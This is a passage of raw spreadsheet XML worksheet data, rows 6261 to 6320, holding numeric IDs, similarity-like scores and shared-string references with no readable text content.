      <c r="G6261" t="s">
        <v>12383</v>
      </c>
      <c r="H6261" t="s">
        <v>12384</v>
      </c>
    </row>
    <row r="6262" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6262" s="1">
        <v>6260</v>
      </c>
      <c r="B6262">
        <v>102</v>
      </c>
      <c r="C6262">
        <v>102</v>
      </c>
      <c r="D6262">
        <v>3</v>
      </c>
      <c r="E6262">
        <v>0.76169997453689575</v>
      </c>
      <c r="F6262" t="s">
        <v>10120</v>
      </c>
      <c r="G6262" t="s">
        <v>12385</v>
      </c>
      <c r="H6262" t="s">
        <v>12386</v>
      </c>
    </row>
    <row r="6263" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6263" s="1">
        <v>6261</v>
      </c>
      <c r="B6263">
        <v>5327</v>
      </c>
      <c r="C6263">
        <v>5327</v>
      </c>
      <c r="D6263">
        <v>3</v>
      </c>
      <c r="E6263">
        <v>0.57639998197555542</v>
      </c>
      <c r="F6263" t="s">
        <v>10120</v>
      </c>
      <c r="G6263" t="s">
        <v>12387</v>
      </c>
      <c r="H6263" t="s">
        <v>12388</v>
      </c>
    </row>
    <row r="6264" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6264" s="1">
        <v>6262</v>
      </c>
      <c r="B6264">
        <v>339</v>
      </c>
      <c r="C6264">
        <v>339</v>
      </c>
      <c r="D6264">
        <v>3</v>
      </c>
      <c r="E6264">
        <v>0.62480002641677856</v>
      </c>
      <c r="F6264" t="s">
        <v>10120</v>
      </c>
      <c r="G6264" t="s">
        <v>12389</v>
      </c>
      <c r="H6264" t="s">
        <v>12390</v>
      </c>
    </row>
    <row r="6265" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6265" s="1">
        <v>6263</v>
      </c>
      <c r="B6265">
        <v>4663</v>
      </c>
      <c r="C6265">
        <v>4663</v>
      </c>
      <c r="D6265">
        <v>3</v>
      </c>
      <c r="E6265">
        <v>0.83389997482299805</v>
      </c>
      <c r="F6265" t="s">
        <v>10120</v>
      </c>
      <c r="G6265" t="s">
        <v>12391</v>
      </c>
      <c r="H6265" t="s">
        <v>12392</v>
      </c>
    </row>
    <row r="6266" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6266" s="1">
        <v>6264</v>
      </c>
      <c r="B6266">
        <v>4670</v>
      </c>
      <c r="C6266">
        <v>4670</v>
      </c>
      <c r="D6266">
        <v>3</v>
      </c>
      <c r="E6266">
        <v>0.64859998226165771</v>
      </c>
      <c r="F6266" t="s">
        <v>10120</v>
      </c>
      <c r="G6266" t="s">
        <v>12393</v>
      </c>
      <c r="H6266" t="s">
        <v>12394</v>
      </c>
    </row>
    <row r="6267" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6267" s="1">
        <v>6265</v>
      </c>
      <c r="B6267">
        <v>4671</v>
      </c>
      <c r="C6267">
        <v>4671</v>
      </c>
      <c r="D6267">
        <v>3</v>
      </c>
      <c r="E6267">
        <v>0.77890002727508545</v>
      </c>
      <c r="F6267" t="s">
        <v>10120</v>
      </c>
      <c r="G6267" t="s">
        <v>12395</v>
      </c>
      <c r="H6267" t="s">
        <v>12396</v>
      </c>
    </row>
    <row r="6268" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6268" s="1">
        <v>6266</v>
      </c>
      <c r="B6268">
        <v>4674</v>
      </c>
      <c r="C6268">
        <v>4674</v>
      </c>
      <c r="D6268">
        <v>3</v>
      </c>
      <c r="E6268">
        <v>0.98430001735687256</v>
      </c>
      <c r="F6268" t="s">
        <v>10120</v>
      </c>
      <c r="G6268" t="s">
        <v>12397</v>
      </c>
      <c r="H6268" t="s">
        <v>12398</v>
      </c>
    </row>
    <row r="6269" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6269" s="1">
        <v>6267</v>
      </c>
      <c r="B6269">
        <v>5325</v>
      </c>
      <c r="C6269">
        <v>5325</v>
      </c>
      <c r="D6269">
        <v>3</v>
      </c>
      <c r="E6269">
        <v>0.66839998960494995</v>
      </c>
      <c r="F6269" t="s">
        <v>10120</v>
      </c>
      <c r="G6269" t="s">
        <v>12399</v>
      </c>
      <c r="H6269" t="s">
        <v>12400</v>
      </c>
    </row>
    <row r="6270" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6270" s="1">
        <v>6268</v>
      </c>
      <c r="B6270">
        <v>5326</v>
      </c>
      <c r="C6270">
        <v>5326</v>
      </c>
      <c r="D6270">
        <v>3</v>
      </c>
      <c r="E6270">
        <v>0.80629998445510864</v>
      </c>
      <c r="F6270" t="s">
        <v>10120</v>
      </c>
      <c r="G6270" t="s">
        <v>12401</v>
      </c>
      <c r="H6270" t="s">
        <v>12402</v>
      </c>
    </row>
    <row r="6271" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6271" s="1">
        <v>6269</v>
      </c>
      <c r="B6271">
        <v>101</v>
      </c>
      <c r="C6271">
        <v>101</v>
      </c>
      <c r="D6271">
        <v>3</v>
      </c>
      <c r="E6271">
        <v>0.72020000219345093</v>
      </c>
      <c r="F6271" t="s">
        <v>10120</v>
      </c>
      <c r="G6271" t="s">
        <v>12403</v>
      </c>
      <c r="H6271" t="s">
        <v>12404</v>
      </c>
    </row>
    <row r="6272" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6272" s="1">
        <v>6270</v>
      </c>
      <c r="B6272">
        <v>4639</v>
      </c>
      <c r="C6272">
        <v>4639</v>
      </c>
      <c r="D6272">
        <v>3</v>
      </c>
      <c r="E6272">
        <v>0.62290000915527344</v>
      </c>
      <c r="F6272" t="s">
        <v>10120</v>
      </c>
      <c r="G6272" t="s">
        <v>12405</v>
      </c>
      <c r="H6272" t="s">
        <v>12406</v>
      </c>
    </row>
    <row r="6273" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6273" s="1">
        <v>6271</v>
      </c>
      <c r="B6273">
        <v>5354</v>
      </c>
      <c r="C6273">
        <v>5354</v>
      </c>
      <c r="D6273">
        <v>3</v>
      </c>
      <c r="E6273">
        <v>0.60530000925064087</v>
      </c>
      <c r="F6273" t="s">
        <v>10120</v>
      </c>
      <c r="G6273" t="s">
        <v>12407</v>
      </c>
      <c r="H6273" t="s">
        <v>12408</v>
      </c>
    </row>
    <row r="6274" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6274" s="1">
        <v>6272</v>
      </c>
      <c r="B6274">
        <v>5370</v>
      </c>
      <c r="C6274">
        <v>5370</v>
      </c>
      <c r="D6274">
        <v>3</v>
      </c>
      <c r="E6274">
        <v>0.93680000305175781</v>
      </c>
      <c r="F6274" t="s">
        <v>10120</v>
      </c>
      <c r="G6274" t="s">
        <v>12409</v>
      </c>
      <c r="H6274" t="s">
        <v>12410</v>
      </c>
    </row>
    <row r="6275" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6275" s="1">
        <v>6273</v>
      </c>
      <c r="B6275">
        <v>84</v>
      </c>
      <c r="C6275">
        <v>84</v>
      </c>
      <c r="D6275">
        <v>3</v>
      </c>
      <c r="E6275">
        <v>0.87419998645782471</v>
      </c>
      <c r="F6275" t="s">
        <v>10120</v>
      </c>
      <c r="G6275" t="s">
        <v>12411</v>
      </c>
      <c r="H6275" t="s">
        <v>12412</v>
      </c>
    </row>
    <row r="6276" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6276" s="1">
        <v>6274</v>
      </c>
      <c r="B6276">
        <v>85</v>
      </c>
      <c r="C6276">
        <v>85</v>
      </c>
      <c r="D6276">
        <v>3</v>
      </c>
      <c r="E6276">
        <v>0.758899986743927</v>
      </c>
      <c r="F6276" t="s">
        <v>10120</v>
      </c>
      <c r="G6276" t="s">
        <v>12413</v>
      </c>
      <c r="H6276" t="s">
        <v>12414</v>
      </c>
    </row>
    <row r="6277" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6277" s="1">
        <v>6275</v>
      </c>
      <c r="B6277">
        <v>363</v>
      </c>
      <c r="C6277">
        <v>363</v>
      </c>
      <c r="D6277">
        <v>3</v>
      </c>
      <c r="E6277">
        <v>0.69849997758865356</v>
      </c>
      <c r="F6277" t="s">
        <v>10120</v>
      </c>
      <c r="G6277" t="s">
        <v>12415</v>
      </c>
      <c r="H6277" t="s">
        <v>12416</v>
      </c>
    </row>
    <row r="6278" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6278" s="1">
        <v>6276</v>
      </c>
      <c r="B6278">
        <v>362</v>
      </c>
      <c r="C6278">
        <v>362</v>
      </c>
      <c r="D6278">
        <v>3</v>
      </c>
      <c r="E6278">
        <v>0.69830000400543213</v>
      </c>
      <c r="F6278" t="s">
        <v>10120</v>
      </c>
      <c r="G6278" t="s">
        <v>12417</v>
      </c>
      <c r="H6278" t="s">
        <v>12416</v>
      </c>
    </row>
    <row r="6279" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6279" s="1">
        <v>6277</v>
      </c>
      <c r="B6279">
        <v>4612</v>
      </c>
      <c r="C6279">
        <v>4612</v>
      </c>
      <c r="D6279">
        <v>3</v>
      </c>
      <c r="E6279">
        <v>0.94160002470016479</v>
      </c>
      <c r="F6279" t="s">
        <v>10120</v>
      </c>
      <c r="G6279" t="s">
        <v>12418</v>
      </c>
      <c r="H6279" t="s">
        <v>12419</v>
      </c>
    </row>
    <row r="6280" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6280" s="1">
        <v>6278</v>
      </c>
      <c r="B6280">
        <v>360</v>
      </c>
      <c r="C6280">
        <v>360</v>
      </c>
      <c r="D6280">
        <v>3</v>
      </c>
      <c r="E6280">
        <v>0.96230000257492065</v>
      </c>
      <c r="F6280" t="s">
        <v>10120</v>
      </c>
      <c r="G6280" t="s">
        <v>12420</v>
      </c>
      <c r="H6280" t="s">
        <v>12421</v>
      </c>
    </row>
    <row r="6281" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6281" s="1">
        <v>6279</v>
      </c>
      <c r="B6281">
        <v>359</v>
      </c>
      <c r="C6281">
        <v>359</v>
      </c>
      <c r="D6281">
        <v>3</v>
      </c>
      <c r="E6281">
        <v>0.99279999732971191</v>
      </c>
      <c r="F6281" t="s">
        <v>10120</v>
      </c>
      <c r="G6281" t="s">
        <v>12422</v>
      </c>
      <c r="H6281" t="s">
        <v>12423</v>
      </c>
    </row>
    <row r="6282" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6282" s="1">
        <v>6280</v>
      </c>
      <c r="B6282">
        <v>358</v>
      </c>
      <c r="C6282">
        <v>358</v>
      </c>
      <c r="D6282">
        <v>3</v>
      </c>
      <c r="E6282">
        <v>0.98830002546310425</v>
      </c>
      <c r="F6282" t="s">
        <v>10120</v>
      </c>
      <c r="G6282" t="s">
        <v>12424</v>
      </c>
      <c r="H6282" t="s">
        <v>12425</v>
      </c>
    </row>
    <row r="6283" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6283" s="1">
        <v>6281</v>
      </c>
      <c r="B6283">
        <v>4622</v>
      </c>
      <c r="C6283">
        <v>4622</v>
      </c>
      <c r="D6283">
        <v>3</v>
      </c>
      <c r="E6283">
        <v>0.99889999628067017</v>
      </c>
      <c r="F6283" t="s">
        <v>10120</v>
      </c>
      <c r="G6283" t="s">
        <v>12426</v>
      </c>
      <c r="H6283" t="s">
        <v>12427</v>
      </c>
    </row>
    <row r="6284" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6284" s="1">
        <v>6282</v>
      </c>
      <c r="B6284">
        <v>5356</v>
      </c>
      <c r="C6284">
        <v>5356</v>
      </c>
      <c r="D6284">
        <v>3</v>
      </c>
      <c r="E6284">
        <v>0.4000999927520752</v>
      </c>
      <c r="F6284" t="s">
        <v>10120</v>
      </c>
      <c r="G6284" t="s">
        <v>12428</v>
      </c>
      <c r="H6284" t="s">
        <v>12429</v>
      </c>
    </row>
    <row r="6285" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6285" s="1">
        <v>6283</v>
      </c>
      <c r="B6285">
        <v>5355</v>
      </c>
      <c r="C6285">
        <v>5355</v>
      </c>
      <c r="D6285">
        <v>3</v>
      </c>
      <c r="E6285">
        <v>0.85939997434616089</v>
      </c>
      <c r="F6285" t="s">
        <v>10120</v>
      </c>
      <c r="G6285" t="s">
        <v>12430</v>
      </c>
      <c r="H6285" t="s">
        <v>12431</v>
      </c>
    </row>
    <row r="6286" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6286" s="1">
        <v>6284</v>
      </c>
      <c r="B6286">
        <v>4623</v>
      </c>
      <c r="C6286">
        <v>4623</v>
      </c>
      <c r="D6286">
        <v>3</v>
      </c>
      <c r="E6286">
        <v>0.8651999831199646</v>
      </c>
      <c r="F6286" t="s">
        <v>10120</v>
      </c>
      <c r="G6286" t="s">
        <v>12432</v>
      </c>
      <c r="H6286" t="s">
        <v>12433</v>
      </c>
    </row>
    <row r="6287" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6287" s="1">
        <v>6285</v>
      </c>
      <c r="B6287">
        <v>4624</v>
      </c>
      <c r="C6287">
        <v>4624</v>
      </c>
      <c r="D6287">
        <v>3</v>
      </c>
      <c r="E6287">
        <v>0.98960000276565552</v>
      </c>
      <c r="F6287" t="s">
        <v>10120</v>
      </c>
      <c r="G6287" t="s">
        <v>12434</v>
      </c>
      <c r="H6287" t="s">
        <v>12435</v>
      </c>
    </row>
    <row r="6288" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6288" s="1">
        <v>6286</v>
      </c>
      <c r="B6288">
        <v>4626</v>
      </c>
      <c r="C6288">
        <v>4626</v>
      </c>
      <c r="D6288">
        <v>3</v>
      </c>
      <c r="E6288">
        <v>0.60909998416900635</v>
      </c>
      <c r="F6288" t="s">
        <v>10120</v>
      </c>
      <c r="G6288" t="s">
        <v>12436</v>
      </c>
      <c r="H6288" t="s">
        <v>12437</v>
      </c>
    </row>
    <row r="6289" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6289" s="1">
        <v>6287</v>
      </c>
      <c r="B6289">
        <v>5324</v>
      </c>
      <c r="C6289">
        <v>5324</v>
      </c>
      <c r="D6289">
        <v>3</v>
      </c>
      <c r="E6289">
        <v>0.45109999179840088</v>
      </c>
      <c r="F6289" t="s">
        <v>10120</v>
      </c>
      <c r="G6289" t="s">
        <v>12438</v>
      </c>
      <c r="H6289" t="s">
        <v>12439</v>
      </c>
    </row>
    <row r="6290" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6290" s="1">
        <v>6288</v>
      </c>
      <c r="B6290">
        <v>5371</v>
      </c>
      <c r="C6290">
        <v>5371</v>
      </c>
      <c r="D6290">
        <v>3</v>
      </c>
      <c r="E6290">
        <v>0.53949999809265137</v>
      </c>
      <c r="F6290" t="s">
        <v>10120</v>
      </c>
      <c r="G6290" t="s">
        <v>12440</v>
      </c>
      <c r="H6290" t="s">
        <v>12441</v>
      </c>
    </row>
    <row r="6291" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6291" s="1">
        <v>6289</v>
      </c>
      <c r="B6291">
        <v>5323</v>
      </c>
      <c r="C6291">
        <v>5323</v>
      </c>
      <c r="D6291">
        <v>3</v>
      </c>
      <c r="E6291">
        <v>0.53549998998641968</v>
      </c>
      <c r="F6291" t="s">
        <v>10120</v>
      </c>
      <c r="G6291" t="s">
        <v>12442</v>
      </c>
      <c r="H6291" t="s">
        <v>12443</v>
      </c>
    </row>
    <row r="6292" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6292" s="1">
        <v>6290</v>
      </c>
      <c r="B6292">
        <v>4694</v>
      </c>
      <c r="C6292">
        <v>4694</v>
      </c>
      <c r="D6292">
        <v>3</v>
      </c>
      <c r="E6292">
        <v>0.56790000200271606</v>
      </c>
      <c r="F6292" t="s">
        <v>10120</v>
      </c>
      <c r="G6292" t="s">
        <v>12444</v>
      </c>
      <c r="H6292" t="s">
        <v>12445</v>
      </c>
    </row>
    <row r="6293" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6293" s="1">
        <v>6291</v>
      </c>
      <c r="B6293">
        <v>5315</v>
      </c>
      <c r="C6293">
        <v>5315</v>
      </c>
      <c r="D6293">
        <v>3</v>
      </c>
      <c r="E6293">
        <v>0.78469997644424438</v>
      </c>
      <c r="F6293" t="s">
        <v>10120</v>
      </c>
      <c r="G6293" t="s">
        <v>12446</v>
      </c>
      <c r="H6293" t="s">
        <v>12447</v>
      </c>
    </row>
    <row r="6294" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6294" s="1">
        <v>6292</v>
      </c>
      <c r="B6294">
        <v>3966</v>
      </c>
      <c r="C6294">
        <v>3966</v>
      </c>
      <c r="D6294">
        <v>3</v>
      </c>
      <c r="E6294">
        <v>0.60759997367858887</v>
      </c>
      <c r="F6294" t="s">
        <v>10120</v>
      </c>
      <c r="G6294" t="s">
        <v>12448</v>
      </c>
      <c r="H6294" t="s">
        <v>12449</v>
      </c>
    </row>
    <row r="6295" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6295" s="1">
        <v>6293</v>
      </c>
      <c r="B6295">
        <v>315</v>
      </c>
      <c r="C6295">
        <v>315</v>
      </c>
      <c r="D6295">
        <v>3</v>
      </c>
      <c r="E6295">
        <v>0.72200000286102295</v>
      </c>
      <c r="F6295" t="s">
        <v>10120</v>
      </c>
      <c r="G6295" t="s">
        <v>12450</v>
      </c>
      <c r="H6295" t="s">
        <v>12451</v>
      </c>
    </row>
    <row r="6296" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6296" s="1">
        <v>6294</v>
      </c>
      <c r="B6296">
        <v>4769</v>
      </c>
      <c r="C6296">
        <v>4769</v>
      </c>
      <c r="D6296">
        <v>3</v>
      </c>
      <c r="E6296">
        <v>0.92489999532699585</v>
      </c>
      <c r="F6296" t="s">
        <v>10120</v>
      </c>
      <c r="G6296" t="s">
        <v>12452</v>
      </c>
      <c r="H6296" t="s">
        <v>12453</v>
      </c>
    </row>
    <row r="6297" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6297" s="1">
        <v>6295</v>
      </c>
      <c r="B6297">
        <v>4779</v>
      </c>
      <c r="C6297">
        <v>4779</v>
      </c>
      <c r="D6297">
        <v>3</v>
      </c>
      <c r="E6297">
        <v>0.99459999799728394</v>
      </c>
      <c r="F6297" t="s">
        <v>10120</v>
      </c>
      <c r="G6297" t="s">
        <v>12454</v>
      </c>
      <c r="H6297" t="s">
        <v>12455</v>
      </c>
    </row>
    <row r="6298" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6298" s="1">
        <v>6296</v>
      </c>
      <c r="B6298">
        <v>314</v>
      </c>
      <c r="C6298">
        <v>314</v>
      </c>
      <c r="D6298">
        <v>3</v>
      </c>
      <c r="E6298">
        <v>0.40209999680519098</v>
      </c>
      <c r="F6298" t="s">
        <v>10120</v>
      </c>
      <c r="G6298" t="s">
        <v>12456</v>
      </c>
      <c r="H6298" t="s">
        <v>12457</v>
      </c>
    </row>
    <row r="6299" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6299" s="1">
        <v>6297</v>
      </c>
      <c r="B6299">
        <v>4763</v>
      </c>
      <c r="C6299">
        <v>4763</v>
      </c>
      <c r="D6299">
        <v>3</v>
      </c>
      <c r="E6299">
        <v>0.67269998788833618</v>
      </c>
      <c r="F6299" t="s">
        <v>10120</v>
      </c>
      <c r="G6299" t="s">
        <v>12458</v>
      </c>
      <c r="H6299" t="s">
        <v>12459</v>
      </c>
    </row>
    <row r="6300" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6300" s="1">
        <v>6298</v>
      </c>
      <c r="B6300">
        <v>5314</v>
      </c>
      <c r="C6300">
        <v>5314</v>
      </c>
      <c r="D6300">
        <v>3</v>
      </c>
      <c r="E6300">
        <v>0.6908000111579895</v>
      </c>
      <c r="F6300" t="s">
        <v>10120</v>
      </c>
      <c r="G6300" t="s">
        <v>12460</v>
      </c>
      <c r="H6300" t="s">
        <v>12461</v>
      </c>
    </row>
    <row r="6301" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6301" s="1">
        <v>6299</v>
      </c>
      <c r="B6301">
        <v>4792</v>
      </c>
      <c r="C6301">
        <v>4792</v>
      </c>
      <c r="D6301">
        <v>3</v>
      </c>
      <c r="E6301">
        <v>0.34479999542236328</v>
      </c>
      <c r="F6301" t="s">
        <v>10120</v>
      </c>
      <c r="G6301" t="s">
        <v>12462</v>
      </c>
      <c r="H6301" t="s">
        <v>12463</v>
      </c>
    </row>
    <row r="6302" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6302" s="1">
        <v>6300</v>
      </c>
      <c r="B6302">
        <v>5313</v>
      </c>
      <c r="C6302">
        <v>5313</v>
      </c>
      <c r="D6302">
        <v>3</v>
      </c>
      <c r="E6302">
        <v>0.43779999017715449</v>
      </c>
      <c r="F6302" t="s">
        <v>10120</v>
      </c>
      <c r="G6302" t="s">
        <v>12464</v>
      </c>
      <c r="H6302" t="s">
        <v>12465</v>
      </c>
    </row>
    <row r="6303" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6303" s="1">
        <v>6301</v>
      </c>
      <c r="B6303">
        <v>4793</v>
      </c>
      <c r="C6303">
        <v>4793</v>
      </c>
      <c r="D6303">
        <v>3</v>
      </c>
      <c r="E6303">
        <v>0.65030002593994141</v>
      </c>
      <c r="F6303" t="s">
        <v>10120</v>
      </c>
      <c r="G6303" t="s">
        <v>12466</v>
      </c>
      <c r="H6303" t="s">
        <v>12467</v>
      </c>
    </row>
    <row r="6304" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6304" s="1">
        <v>6302</v>
      </c>
      <c r="B6304">
        <v>4816</v>
      </c>
      <c r="C6304">
        <v>4816</v>
      </c>
      <c r="D6304">
        <v>3</v>
      </c>
      <c r="E6304">
        <v>0.81470000743865967</v>
      </c>
      <c r="F6304" t="s">
        <v>10120</v>
      </c>
      <c r="G6304" t="s">
        <v>12468</v>
      </c>
      <c r="H6304" t="s">
        <v>12469</v>
      </c>
    </row>
    <row r="6305" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6305" s="1">
        <v>6303</v>
      </c>
      <c r="B6305">
        <v>111</v>
      </c>
      <c r="C6305">
        <v>111</v>
      </c>
      <c r="D6305">
        <v>3</v>
      </c>
      <c r="E6305">
        <v>0.58719998598098755</v>
      </c>
      <c r="F6305" t="s">
        <v>10120</v>
      </c>
      <c r="G6305" t="s">
        <v>12470</v>
      </c>
      <c r="H6305" t="s">
        <v>12471</v>
      </c>
    </row>
    <row r="6306" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6306" s="1">
        <v>6304</v>
      </c>
      <c r="B6306">
        <v>114</v>
      </c>
      <c r="C6306">
        <v>114</v>
      </c>
      <c r="D6306">
        <v>3</v>
      </c>
      <c r="E6306">
        <v>0.72109997272491455</v>
      </c>
      <c r="F6306" t="s">
        <v>10120</v>
      </c>
      <c r="G6306" t="s">
        <v>12472</v>
      </c>
      <c r="H6306" t="s">
        <v>12473</v>
      </c>
    </row>
    <row r="6307" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6307" s="1">
        <v>6305</v>
      </c>
      <c r="B6307">
        <v>313</v>
      </c>
      <c r="C6307">
        <v>313</v>
      </c>
      <c r="D6307">
        <v>3</v>
      </c>
      <c r="E6307">
        <v>0.70730000734329224</v>
      </c>
      <c r="F6307" t="s">
        <v>10120</v>
      </c>
      <c r="G6307" t="s">
        <v>12474</v>
      </c>
      <c r="H6307" t="s">
        <v>12475</v>
      </c>
    </row>
    <row r="6308" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6308" s="1">
        <v>6306</v>
      </c>
      <c r="B6308">
        <v>4752</v>
      </c>
      <c r="C6308">
        <v>4752</v>
      </c>
      <c r="D6308">
        <v>3</v>
      </c>
      <c r="E6308">
        <v>0.9725000262260437</v>
      </c>
      <c r="F6308" t="s">
        <v>10120</v>
      </c>
      <c r="G6308" t="s">
        <v>12476</v>
      </c>
      <c r="H6308" t="s">
        <v>12477</v>
      </c>
    </row>
    <row r="6309" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6309" s="1">
        <v>6307</v>
      </c>
      <c r="B6309">
        <v>4746</v>
      </c>
      <c r="C6309">
        <v>4746</v>
      </c>
      <c r="D6309">
        <v>3</v>
      </c>
      <c r="E6309">
        <v>0.98650002479553223</v>
      </c>
      <c r="F6309" t="s">
        <v>10120</v>
      </c>
      <c r="G6309" t="s">
        <v>12478</v>
      </c>
      <c r="H6309" t="s">
        <v>12479</v>
      </c>
    </row>
    <row r="6310" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6310" s="1">
        <v>6308</v>
      </c>
      <c r="B6310">
        <v>5316</v>
      </c>
      <c r="C6310">
        <v>5316</v>
      </c>
      <c r="D6310">
        <v>3</v>
      </c>
      <c r="E6310">
        <v>0.49599999189376831</v>
      </c>
      <c r="F6310" t="s">
        <v>10120</v>
      </c>
      <c r="G6310" t="s">
        <v>12480</v>
      </c>
      <c r="H6310" t="s">
        <v>12481</v>
      </c>
    </row>
    <row r="6311" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6311" s="1">
        <v>6309</v>
      </c>
      <c r="B6311">
        <v>4695</v>
      </c>
      <c r="C6311">
        <v>4695</v>
      </c>
      <c r="D6311">
        <v>3</v>
      </c>
      <c r="E6311">
        <v>0.48469999432563782</v>
      </c>
      <c r="F6311" t="s">
        <v>10120</v>
      </c>
      <c r="G6311" t="s">
        <v>12482</v>
      </c>
      <c r="H6311" t="s">
        <v>12483</v>
      </c>
    </row>
    <row r="6312" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6312" s="1">
        <v>6310</v>
      </c>
      <c r="B6312">
        <v>333</v>
      </c>
      <c r="C6312">
        <v>333</v>
      </c>
      <c r="D6312">
        <v>3</v>
      </c>
      <c r="E6312">
        <v>0.59490001201629639</v>
      </c>
      <c r="F6312" t="s">
        <v>10120</v>
      </c>
      <c r="G6312" t="s">
        <v>12484</v>
      </c>
      <c r="H6312" t="s">
        <v>12485</v>
      </c>
    </row>
    <row r="6313" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6313" s="1">
        <v>6311</v>
      </c>
      <c r="B6313">
        <v>5321</v>
      </c>
      <c r="C6313">
        <v>5321</v>
      </c>
      <c r="D6313">
        <v>3</v>
      </c>
      <c r="E6313">
        <v>0.49619999527931208</v>
      </c>
      <c r="F6313" t="s">
        <v>10120</v>
      </c>
      <c r="G6313" t="s">
        <v>12486</v>
      </c>
      <c r="H6313" t="s">
        <v>12487</v>
      </c>
    </row>
    <row r="6314" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6314" s="1">
        <v>6312</v>
      </c>
      <c r="B6314">
        <v>4701</v>
      </c>
      <c r="C6314">
        <v>4701</v>
      </c>
      <c r="D6314">
        <v>3</v>
      </c>
      <c r="E6314">
        <v>0.99190002679824829</v>
      </c>
      <c r="F6314" t="s">
        <v>10120</v>
      </c>
      <c r="G6314" t="s">
        <v>12488</v>
      </c>
      <c r="H6314" t="s">
        <v>12489</v>
      </c>
    </row>
    <row r="6315" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6315" s="1">
        <v>6313</v>
      </c>
      <c r="B6315">
        <v>331</v>
      </c>
      <c r="C6315">
        <v>331</v>
      </c>
      <c r="D6315">
        <v>3</v>
      </c>
      <c r="E6315">
        <v>0.68849998712539673</v>
      </c>
      <c r="F6315" t="s">
        <v>10120</v>
      </c>
      <c r="G6315" t="s">
        <v>12490</v>
      </c>
      <c r="H6315" t="s">
        <v>12491</v>
      </c>
    </row>
    <row r="6316" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6316" s="1">
        <v>6314</v>
      </c>
      <c r="B6316">
        <v>329</v>
      </c>
      <c r="C6316">
        <v>329</v>
      </c>
      <c r="D6316">
        <v>3</v>
      </c>
      <c r="E6316">
        <v>0.66159999370574951</v>
      </c>
      <c r="F6316" t="s">
        <v>10120</v>
      </c>
      <c r="G6316" t="s">
        <v>12492</v>
      </c>
      <c r="H6316" t="s">
        <v>12493</v>
      </c>
    </row>
    <row r="6317" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6317" s="1">
        <v>6315</v>
      </c>
      <c r="B6317">
        <v>327</v>
      </c>
      <c r="C6317">
        <v>327</v>
      </c>
      <c r="D6317">
        <v>3</v>
      </c>
      <c r="E6317">
        <v>0.98600000143051147</v>
      </c>
      <c r="F6317" t="s">
        <v>10120</v>
      </c>
      <c r="G6317" t="s">
        <v>12494</v>
      </c>
      <c r="H6317" t="s">
        <v>12495</v>
      </c>
    </row>
    <row r="6318" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6318" s="1">
        <v>6316</v>
      </c>
      <c r="B6318">
        <v>5320</v>
      </c>
      <c r="C6318">
        <v>5320</v>
      </c>
      <c r="D6318">
        <v>3</v>
      </c>
      <c r="E6318">
        <v>0.66299998760223389</v>
      </c>
      <c r="F6318" t="s">
        <v>10120</v>
      </c>
      <c r="G6318" t="s">
        <v>12496</v>
      </c>
      <c r="H6318" t="s">
        <v>12497</v>
      </c>
    </row>
    <row r="6319" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6319" s="1">
        <v>6317</v>
      </c>
      <c r="B6319">
        <v>321</v>
      </c>
      <c r="C6319">
        <v>321</v>
      </c>
      <c r="D6319">
        <v>3</v>
      </c>
      <c r="E6319">
        <v>0.99709999561309814</v>
      </c>
      <c r="F6319" t="s">
        <v>10120</v>
      </c>
      <c r="G6319" t="s">
        <v>12498</v>
      </c>
      <c r="H6319" t="s">
        <v>12499</v>
      </c>
    </row>
    <row r="6320" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6320" s="1">
        <v>6318</v>
      </c>
      <c r="B6320">
